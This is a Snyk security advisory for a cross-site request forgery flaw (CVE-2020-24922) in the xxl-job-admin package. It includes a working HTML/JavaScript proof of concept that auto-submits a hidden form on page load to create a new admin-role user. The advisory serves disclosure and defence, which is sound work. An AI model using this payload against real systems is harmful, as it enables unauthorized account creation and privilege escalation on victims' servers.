Cross-site Request Forgery (CSRF) Affecting com.xuxueli:xxl-job-admin package, versions [0,]


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.17% (55th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Cross-site Request Forgery (CSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-COMXUXUELI-5840586
  • published13 Aug 2023
  • disclosed11 Aug 2023
  • creditdevi1syd

Introduced: 11 Aug 2023

CVE-2020-24922  (opens in a new tab)
CWE-352  (opens in a new tab)

How to fix?

There is no fixed version for com.xuxueli:xxl-job-admin.

Overview

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via the xxl-job-admin/user/add functionality, which allows remote attackers to execute arbitrary code and to escalate privileges via a crafted .html file.

PoC

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='username' value='test1' />";
fields += "<input type='hidden' name='password' value='test1' />";  
fields += "<input type='hidden' name='role'    value='0' />";  
fields += "<input type='hidden' name='permission' value='1' />";  


var url = "http://172. 18.71.41:8090/xxl-job-admin/user/add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

References

CVSS Scores

version 3.1